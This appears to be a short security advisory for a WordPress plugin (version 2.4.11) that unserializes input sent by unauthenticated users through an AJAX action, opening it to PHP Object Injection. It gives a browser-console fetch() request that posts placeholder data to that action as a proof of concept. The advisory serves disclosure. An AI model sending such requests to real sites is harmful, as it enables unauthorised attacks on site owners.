Description The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.
Run the below command in the developer console of the web browser while being on the blog unauthenticated fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “fdm_update_cart_item”, “options”: “data-to-unserialize”}), “method”: “POST”, “credentials”: “include” });
CPE | Name | Operator | Version |
---|---|---|---|
eq | 2.4.11 |